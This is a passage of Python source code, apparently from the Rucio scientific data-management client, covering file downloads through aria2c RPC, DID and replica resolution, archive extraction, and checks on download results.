size_str = sizefmt(size, self.is_human_readable)
if size and duration:
rate = round((size / duration) * 1e-6, 2)
logger(logging.INFO, '%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
else:
logger(logging.INFO, '%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))
file_items_in_archive = item.get('archive_items', [])
if len(file_items_in_archive) > 0:
logger(logging.INFO, '%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))
archive_file_path = first_dest_file_path
for file_item in file_items_in_archive:
extraction_ok = False
extract_file_name = file_item['name']
dest_file_path_iter = iter(file_item['dest_file_paths'])
first_dest_file_path = next(dest_file_path_iter)
dest_dir = os.path.dirname(first_dest_file_path)
logger(logging.DEBUG, '%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
for extraction_tool in self.extraction_tools:
if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
extraction_ok = True
break
if not extraction_ok:
logger(logging.ERROR, 'Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
continue
first_dest_file_path = os.path.join(dest_dir, extract_file_name)
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
if not item.get('shall_keep_archive'):
logger(logging.DEBUG, '%sDeleting archive %s' % (log_prefix, did_name))
os.remove(archive_file_path)
return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}, deactivate_file_download_exceptions=False, sort=None):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It only can download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:param sort: Select best replica by replica sorting algorithm. Available algorithms:
``geoip`` - based on src/dst IP topographical distance
``closeness`` - based on src/dst closeness
``dynamic`` - Rucio Dynamic Smart Sort (tm)
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
item['no_resolve_archives'] = True
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items), sort=sort)
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger(logging.ERROR, 'Unknown exception during aria2c download')
self.logger(logging.DEBUG, error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
:returns: a tupel with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
logger(logging.INFO, 'Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger(logging.DEBUG, 'Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger(logging.DEBUG, to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger(logging.DEBUG, 'Failed to start aria2c with port: %d' % port)
logger(logging.DEBUG, 'aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
"""
Uses aria2c to download the given items. Aria2c needs to be started
as RPC background process first and a RPC proxy is needed.
(This function is meant to be used as class internal only)
:param items: list of dictionaries containing one dict for each file to download
:param aria_rcp: RPCProxy to the aria2c process
:param rpc_auth: the rpc authentication token
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
"""
logger = self.logger
gid_to_item = {} # maps an aria2c download id (gid) to the download item
pfn_to_rse = {}
items_to_queue = [item for item in items]
# items get removed from gid_to_item when they are complete or failed
while len(gid_to_item) or len(items_to_queue):
num_queued = 0
# queue up to 100 files and then check arias status
while (num_queued < 100) and len(items_to_queue):
item = items_to_queue.pop()
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
trace = {'scope': file_scope,
'filename': file_name,
'datasetScope': item.get('dataset_scope', ''),
'dataset': item.get('dataset_name', ''),
'protocol': 'https',
'remoteSite': '',
'filesize': item.get('bytes', None),
'transferStart': time.time(),
'transferEnd': time.time()}
trace.update(self.trace_tpl)
trace.update(trace_custom_fields)
# get pfns from all replicas
pfns = []
for src in item['sources']:
pfn = src['pfn']
if pfn[0:4].lower() == 'davs':
pfn = pfn.replace('davs', 'https', 1)
pfns.append(pfn)
pfn_to_rse[pfn] = src['rse']
# does file exist and are sources available?
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
if os.path.isfile(dest_file_path):
logger(logging.INFO, 'File exists already locally: %s' % file_did_str)
item['clientState'] = 'ALREADY_DONE'
trace['clientState'] = 'ALREADY_DONE'
self._send_trace(trace)
elif len(pfns) == 0:
logger(logging.WARNING, 'No available source found for file: %s' % file_did_str)
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
else:
item['trace'] = trace
options = {'dir': os.path.dirname(dest_file_path),
'out': os.path.basename(item['temp_file_path'])}
gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
gid_to_item[gid] = item
num_queued += 1
logger(logging.DEBUG, 'Queued file: %s' % file_did_str)
# get some statistics
aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
num_active = int(aria_stat['numActive'])
num_waiting = int(aria_stat['numWaiting'])
num_stopped = int(aria_stat['numStoppedTotal'])
# save start time if one of the active downloads has started
active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
for dlinfo in active:
gid = dlinfo['gid']
if int(dlinfo['completedLength']) > 0:
gid_to_item[gid].setdefault('transferStart', time.time())
stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
for dlinfo in stopped:
gid = dlinfo['gid']
item = gid_to_item[gid]
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
temp_file_path = item['temp_file_path']
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
# ensure we didnt miss the active state (e.g. a very fast download)
start_time = item.setdefault('transferStart', time.time())
end_time = item.setdefault('transferEnd', time.time())
# get used pfn for traces
trace = item['trace']
for uri in dlinfo['files'][0]['uris']:
if uri['status'].lower() == 'used':
trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
# ensure file exists
status = dlinfo.get('status', '').lower()
if status == 'complete' and os.path.isfile(temp_file_path):
# checksum check
skip_check = item.get('ignore_checksum', False)
rucio_checksum = 0 if skip_check else item.get('adler32')
local_checksum = 0 if skip_check else adler32(temp_file_path)
if str(rucio_checksum).lstrip('0') == str(local_checksum).lstrip('0'):
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
# remove .part ending
os.rename(temp_file_path, dest_file_path)
# calculate duration
duration = round(end_time - start_time, 2)
duration = max(duration, 0.01) # protect against 0 division
size = item.get('bytes', 0)
rate = round((size / duration) * 1e-6, 2)
size_str = sizefmt(size, self.is_human_readable)
logger(logging.INFO, 'File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
size_str,
duration,
rate))
else:
os.unlink(temp_file_path)
logger(logging.WARNING, 'Checksum validation failed for file: %s' % file_did_str)
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
item['clientState'] = 'FAIL_VALIDATE'
trace['clientState'] = 'FAIL_VALIDATE'
else:
logger(logging.ERROR, 'Failed to download file: %s' % file_did_str)
logger(logging.DEBUG, 'Aria2c status: %s' % status)
item['clientState'] = 'FAILED'
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
self._send_trace(trace)
del item['trace']
aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
del gid_to_item[gid]
if len(stopped) > 0:
logger(logging.INFO, 'Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))
return items
def _resolve_one_item_dids(self, item):
"""
Resolve scopes or wildcard DIDs to lists of full did names:
:param item: One input item
"""
dids = item.get('did')
filters = item.get('filters', {})
if filters:
filters = copy.copy(filters)
if dids is None:
self.logger(logging.DEBUG, 'Resolving DIDs by using filter options')
scope = filters.pop('scope')
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
return
if not isinstance(dids, list):
dids = [dids]
for did_str in dids:
scope, did_name = self._split_did_str(did_str)
filters['name'] = did_name
any_did_resolved = False
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
any_did_resolved = True
# Maintain compatibility with existing code, which expects non-existing DIDs be
# passed through in order to correctly set trace state to FILE_NOT_FOUND
if not any_did_resolved and '*' not in did_name:
yield {'scope': scope, 'name': did_name}
def _resolve_and_merge_input_items(self, input_items, sort=None):
"""
This function takes the input items given to download_dids etc.
and resolves the sources.
- It first performs a list_dids call to dereference any wildcards and
retrieve DID stats (size, length, type).
- Next, input items are grouped together by common list_replicas options.
For each group, a single list_replicas call is performed.
- The resolved File DIDs with sources are finally mapped back to initial
input items to be able to correctly retrieve download options
(timeout, destination directories, etc)
:param input_items: List of dictionaries. Each dictionary describing an input item
:returns: a tuple:
- a dictionary that maps the dereferenced(w/o wildcards) input DIDs to a list of input items
- and a list with a dictionary for each file DID which has to be downloaded
:raises InputValidationError: if one of the input items is in the wrong format
"""
logger = self.logger
# check mandatory options before doing any server calls
resolve_archives = False
for item in input_items:
if item.get('resolve_archives') is not None:
logger(logging.WARNING, 'resolve_archives option is deprecated and will be removed in a future release.')
item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))
# If any item needs to resolve archives
if not item.get('no_resolve_archives'):
resolve_archives = True
if not item.get('did'):
if not item.get('filters', {}).get('scope'):
logger(logging.DEBUG, item)
raise InputValidationError('Item without did and filter/scope')
if resolve_archives:
# perhaps we'll need an extraction tool so check what is installed
self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
if len(self.extraction_tools) < 1:
logger(logging.WARNING, 'Archive resolution is enabled but no extraction tool is available. '
'Sources whose protocol doesnt support extraction wont be considered for download.')
# if excluding tapes, we need to list them first
tape_rses = []
if self.is_tape_excluded:
try:
tape_rses = [endp['rse'] for endp in self.client.list_rses(rse_expression='istape=true')]
except:
logger(logging.DEBUG, 'No tapes found.')
# Matches each dereferenced DID back to a list of input items
did_to_input_items = {}
# Resolve DIDs
for item in input_items:
resolved_dids = list(self._resolve_one_item_dids(item))
if not resolved_dids:
logger(logging.WARNING, 'An item didnt have any DIDs after resolving the input: %s.' % item.get('did', item))
item['dids'] = resolved_dids
for did in resolved_dids:
did_to_input_items.setdefault(DID(did), []).append(item)
if 'length' in did and not did['length']:
did_with_size = self.client.get_did(scope=did['scope'], name=did['name'], dynamic=True)
did['length'] = did_with_size['length']
did['bytes'] = did_with_size['bytes']
# group input items by common options to reduce the number of calls to list_replicas
distinct_keys = ['rse', 'force_scheme', 'no_resolve_archives']
item_groups = []
for item in input_items:
found_compatible_group = False
if not item.get('nrandom'):
# Don't merge items if nrandom is set. Otherwise two items with the same nrandom will be merged into one
# and we'll effectively download only half of the desired replicas for each item.
for item_group in item_groups:
if all(item.get(k) == item_group[0].get(k) for k in distinct_keys):
item_group.append(item)
found_compatible_group = True
break
if not found_compatible_group:
item_groups.append([item])
# List replicas for dids
merged_items_with_sources = []
for item_group in item_groups:
# Take configuration from the first item in the group; but dids from all items
item = item_group[0]
input_dids = {DID(did): did
for item in item_group
for did in item.get('dids')}
# since we're using metalink we need to explicitly give all schemes
schemes = item.get('force_scheme')
if schemes:
schemes = schemes if isinstance(schemes, list) else [schemes]
logger(logging.DEBUG, 'schemes: %s' % schemes)
# RSE expression, still with tape endpoints included
rse_expression = item.get('rse')
logger(logging.DEBUG, 'rse_expression: %s' % rse_expression)
# obtaining the choice of Implementation
impl = item.get('impl')
if impl:
impl_split = impl.split('.')
if len(impl_split) == 1:
impl = 'rucio.rse.protocols.' + impl + '.Default'
else:
impl = 'rucio.rse.protocols.' + impl
logger(logging.DEBUG, 'impl: %s' % impl)
# get PFNs of files and datasets
logger(logging.DEBUG, 'num DIDs for list_replicas call: %d' % len(item['dids']))
nrandom = item.get('nrandom')
if nrandom:
logger(logging.INFO, 'Selecting %d random replicas from DID(s): %s' % (nrandom, [str(did) for did in input_dids]))
metalink_str = self.client.list_replicas([{'scope': did.scope, 'name': did.name} for did in input_dids],
schemes=schemes,
ignore_availability=False,
rse_expression=rse_expression,
client_location=self.client_location,
sort=sort,
resolve_archives=not item.get('no_resolve_archives'),
resolve_parents=True,
nrandom=nrandom,
metalink=True)
file_items = parse_replicas_from_string(metalink_str)
for file in file_items:
if impl:
file['impl'] = impl
elif not item.get('force_scheme'):
file['impl'] = self.preferred_impl(file['sources'])
logger(logging.DEBUG, 'num resolved files: %s' % len(file_items))
if not nrandom or nrandom != len(file_items):
# If list_replicas didn't resolve any file DIDs for any input did, we pass through the input DID.
# This is done to keep compatibility with later code which generates "FILE_NOT_FOUND" traces
# and output items.
# In the special case of nrandom, when serverside filtering is applied, it's "normal" for some input
# dids to be ignored as long as we got exactly nrandom file_items from the server.
for input_did in input_dids:
if not any([input_did == f['did'] or str(input_did) in f['parent_dids'] for f in file_items]):
logger(logging.ERROR, 'DID does not exist: %s' % input_did)
# TODO: store did directly as DIDType object
file_items.append({'did': str(input_did), 'adler32': None, 'md5': None, 'sources': [], 'parent_dids': set(), 'impl': impl or None})
# filtering out tape sources
if self.is_tape_excluded:
for file_item in file_items:
unfiltered_sources = copy.copy(file_item['sources'])
for src in unfiltered_sources:
if src['rse'] in tape_rses:
file_item['sources'].remove(src)
if unfiltered_sources and not file_item['sources']:
logger(logging.WARNING, 'The requested DID {} only has replicas on tape. Direct download from tape is prohibited. '
'Please request a transfer to a non-tape endpoint.'.format(file_item['did']))
# Match the file did back to the dids which were provided to list_replicas.
# Later, this will allow to match the file back to input_items via did_to_input_items
for file_item in file_items:
file_did = DID(file_item['did'])
file_input_dids = {DID(did) for did in file_item.get('parent_dids', [])}.intersection(input_dids)
if file_did in input_dids:
file_input_dids.add(file_did)
file_item['input_dids'] = {did: input_dids[did] for did in file_input_dids}
merged_items_with_sources.extend(file_items)
return did_to_input_items, merged_items_with_sources
def _options_from_input_items(self, input_items):
"""
Best-effort generation of download options from multiple input items which resolve to the same file DID.
This is done to download each file DID only once, even if it is requested multiple times via overlapping
datasets and/or wildcard resolutions in distinct input items.
Some options can be easily merged. For example: multiple base_dir are all appended to a list. As a result,
the file is downloaded once and copied to all desired destinations.
Other options are not necessarily compatible. For example, two items requesting two different values for
download timeout. We make our best to merge the options in such cases.
"""
options = {}
for item in input_items:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
new_transfer_timeout = item.get('transfer_timeout', None)
new_transfer_speed_timeout = item.get('transfer_speed_timeout', None)
options.setdefault('destinations', set()).add((base_dir, no_subdir))
# Merge some options
# The other options of this DID will be inherited from the first item that contained the DID
options['ignore_checksum'] = options.get('ignore_checksum') or item.get('ignore_checksum', False)
options['check_local_with_filesize_only'] = options.get('check_local_with_filesize_only') or item.get('check_local_with_filesize_only', False)
# if one item wants to resolve archives we enable it for all items
options['resolve_archives'] = (options.get('resolve_archives') or not item.get('no_resolve_archives'))
cur_transfer_timeout = options.setdefault('transfer_timeout', None)
if cur_transfer_timeout is not None and new_transfer_timeout is not None:
options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
elif new_transfer_timeout is not None:
options['transfer_timeout'] = int(new_transfer_timeout)
cur_transfer_speed_timeout = options.setdefault('transfer_speed_timeout', None)
if cur_transfer_speed_timeout is not None and new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = min(float(cur_transfer_speed_timeout), float(new_transfer_speed_timeout))
elif new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = float(new_transfer_speed_timeout)
return options
def _prepare_items_for_download(self, did_to_input_items, file_items):
"""
Optimises the amount of files to download
(This function is meant to be used as class internal only)
:param did_to_input_items: dictionary that maps resolved input DIDs to input items
:param file_items: list of dictionaries. Each dictionary describes a File DID to download
:returns: list of dictionaries. Each dictionary describes an element to download
:raises InputValidationError: if the given input is not valid or incomplete
"""
logger = self.logger
# maps file item IDs (fiid) to the file item object
fiid_to_file_item = {}
# cea -> client_extract archives to avoid confusion with archives that dont need explicit extraction
# this dict will contain all ids of cea's that definitely will be downloaded
cea_id_pure_to_fiids = {}
# this dict will contain ids of cea's that have higher prioritised non cea sources
cea_id_mixed_to_fiids = {}
all_dest_file_paths = set()
# get replicas for every file of the given dids
for file_item in file_items:
file_did = DID(file_item['did'])
input_items = list(itertools.chain.from_iterable(did_to_input_items.get(did, []) for did in file_item['input_dids']))
options = self._options_from_input_items(input_items)
file_item['scope'] = file_did.scope
file_item['name'] = file_did.name
logger(logging.DEBUG, 'Queueing file: %s' % file_did)
logger(logging.DEBUG, 'real parents: %s' % [str(did) for did in file_item['input_dids'] if did != file_did])
logger(logging.DEBUG, 'options: %s' % options)
# prepare destinations folders:
dest_file_paths = file_item.get('dest_file_paths', set())
for input_did in file_item['input_dids']:
for item in did_to_input_items[input_did]:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
file_did_path = file_did.name
if input_did != file_did:
# if datasets were given: prepare the destination paths for each dataset
if self.extract_scope_convention == 'belleii' and file_did_path.startswith('/'):
file_did_path = file_did_path.split('/')[-1]
path = os.path.join(self._prepare_dest_dir(base_dir, input_did.name, no_subdir), file_did_path)
else:
# if no datasets were given only prepare the given destination paths
if file_did_path.startswith('/'):
file_did_path = file_did_path[1:]
path = os.path.join(self._prepare_dest_dir(base_dir, file_did.scope, no_subdir), file_did_path)
if path in all_dest_file_paths:
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.add(path)
dest_file_paths.add(path)
# workaround: just take any given dataset for the traces and the output
file_item.setdefault('dataset_scope', input_did.scope)
file_item.setdefault('dataset_name', input_did.name)
if not options:
continue
resolve_archives = options.get('resolve_archives')
file_item['merged_options'] = options
file_item['dest_file_paths'] = list(dest_file_paths)
file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]
# the file did str ist not an unique key for this dict because multiple calls of list_replicas
# could result in the same DID multiple times. So we're using the id of the dictionary objects
fiid = id(file_item)
fiid_to_file_item[fiid] = file_item
if resolve_archives:
min_cea_priority = None
num_non_cea_sources = 0
cea_ids = []
sources = []
# go through sources and check how many (non-)cea sources there are,
# index cea sources, or remove cea sources if there is no extraction tool
for source in file_item['sources']:
is_cea = source.get('client_extract', False)
if is_cea and (len(self.extraction_tools) > 0):
priority = int(source['priority'])
if min_cea_priority is None or priority < min_cea_priority:
min_cea_priority = priority
# workaround since we dont have the archive DID use the part behind the last slash of the PFN
# this doesn't respect the scope of the archive DID!!!
# and we trust that client_extract==True sources dont have any parameters at the end of the PFN
cea_id = source['pfn'].split('/')
cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
cea_ids.append(cea_id)
sources.append(source)
elif not is_cea:
num_non_cea_sources += 1
sources.append(source)
else:
# no extraction tool
logger(logging.DEBUG, 'client_extract=True; ignoring source: %s' % source['pfn'])
logger(logging.DEBUG, 'Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
% (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))
file_item['sources'] = sources
# if there are no cea sources we are done for this item
if min_cea_priority is None:
continue
# decide if file item belongs to the pure or mixed map
# if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
elif num_non_cea_sources == 0 or min_cea_priority == 1:
logger(logging.DEBUG, 'Adding fiid to cea pure map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_pure', set()).add(cea_id)
# if there are non-archive sources and archive sources we put it in the mixed map
elif len(cea_ids) > 0:
logger(logging.DEBUG, 'Adding fiid to cea mixed map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_mixed', set()).add(cea_id)
# put all archives from the mixed list into the pure list if they meet
# certain conditions, e.g., an archive that is already in the pure list
for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
if cea_id_mixed in cea_id_pure_to_fiids:
# file from mixed list is already in a pure list
logger(logging.DEBUG, 'Mixed ID is already in cea pure map: '
'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
% (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
elif len(fiids_mixed) >= self.use_cea_threshold:
# more than use_cea_threshold files are in a common archive
logger(logging.DEBUG, 'Number of needed files in cea reached threshold: '
'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
% (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
else:
# dont move from mixed list to pure list
continue
# first add cea_id to pure map so it can be removed from mixed map later
cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)
# now update all file_item mixed/pure maps
for fiid_mixed in list(fiids_mixed):
file_item = fiid_to_file_item[fiid_mixed]
# add cea id to file_item pure map
file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
# remove file item mixed map and
# remove references from all other mixed archives to file_item
for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)
# finally remove cea_id from mixed map
cea_id_mixed_to_fiids.pop(cea_id_mixed)
for file_item in file_items:
cea_ids_pure = file_item.get('cea_ids_pure', set())
cea_ids_mixed = file_item.get('cea_ids_mixed', set())
if len(cea_ids_pure) > 0:
logger(logging.DEBUG, 'Removing all non-cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
elif len(cea_ids_mixed) > 0:
logger(logging.DEBUG, 'Removing all cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]
# reduce the amount of archives to download by removing
# all redundant pure archives (=all files can be extracted from other archives)
for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
# if all files of this archive are available in more than one archive the archive is redundant
if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
logger(logging.DEBUG, 'Removing redundant archive %s' % cea_id_pure)
cea_id_pure_to_fiids.pop(cea_id_pure)
# remove all archives of a file except a single one so
# that each file is assigned to exactly one pure archive
for cea_id_pure in cea_id_pure_to_fiids:
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']
for cea_id_pure_other in list(cea_ids_pure):
if cea_id_pure != cea_id_pure_other:
cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
cea_ids_pure.discard(cea_id_pure_other)
download_packs = []
cea_id_to_pack = {}
for file_item in file_items:
cea_ids = file_item.get('cea_ids_pure', set())
if len(cea_ids) > 0:
cea_id = next(iter(cea_ids))
pack = cea_id_to_pack.get(cea_id)
if pack is None:
scope = file_item['scope']
first_dest = next(iter(file_item['merged_options']['destinations']))
dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, first_dest[1]), cea_id)
pack = {'scope': scope,
'name': cea_id,
'dest_file_paths': [dest_path],
'temp_file_path': '%s.part' % dest_path,
'sources': file_item['sources'],
'merged_options': {'ignore_checksum': True}, # we currently dont have checksums for the archive
'archive_items': []
}
cea_id_to_pack[cea_id] = pack
download_packs.append(pack)
file_item.pop('sources')
pack['archive_items'].append(file_item)
else:
download_packs.append(file_item)
return download_packs
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
:param did_str: the DID string that will be splitted
:returns: the scope- and name part of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
if self.extract_scope_convention == 'belleii':
scopes = [scope for scope in self.client.list_scopes()]
did_scope, did_name = extract_scope(did[0], scopes)
else:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
raise InputValidationError('%s is not a valid DID. To many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
def _prepare_dest_dir(self, base_dir, dest_dir_name, no_subdir):
"""
Builds the final destination path for a file and creates the
destination directory if it's not existent.
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param no_subdir: if no subdirectory should be created
:returns: the absolut path of the destination directory
"""
# append dest_dir_name, if subdir should be used
if dest_dir_name.startswith('/'):
dest_dir_name = dest_dir_name[1:]
dest_dir_path = os.path.join(os.path.abspath(base_dir), '' if no_subdir else dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
def _check_output(self, output_items, deactivate_file_download_exceptions=False):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if not deactivate_file_download_exceptions and num_successful == 0:
raise NoFilesDownloaded()
elif not deactivate_file_download_exceptions and num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
def _send_trace(self, trace):
"""
Checks if sending trace is allowed and send the trace.
:param trace: the trace
"""
if self.tracing:
send_trace(trace, self.client.trace_host, self.client.user_agent)
def preferred_impl(self, sources):
"""
Finds the optimum protocol impl preferred by the client and
supported by the remote RSE.
:param sources: List of sources for a given DID
:raises RucioException(msg): general exception with msg for more details.
"""
preferred_protocols = []
checked_rses = []
supported_impl = None
try:
preferred_impls = config_get('download', 'preferred_impl')
except Exception as error:
self.logger(logging.INFO, 'No preferred protocol impl in rucio.cfg: %s' % (error))
return supported_impl
else:
preferred_impls = list(preferred_impls.split(', '))
i = 0
while i < len(preferred_impls):
impl = preferred_impls[i]
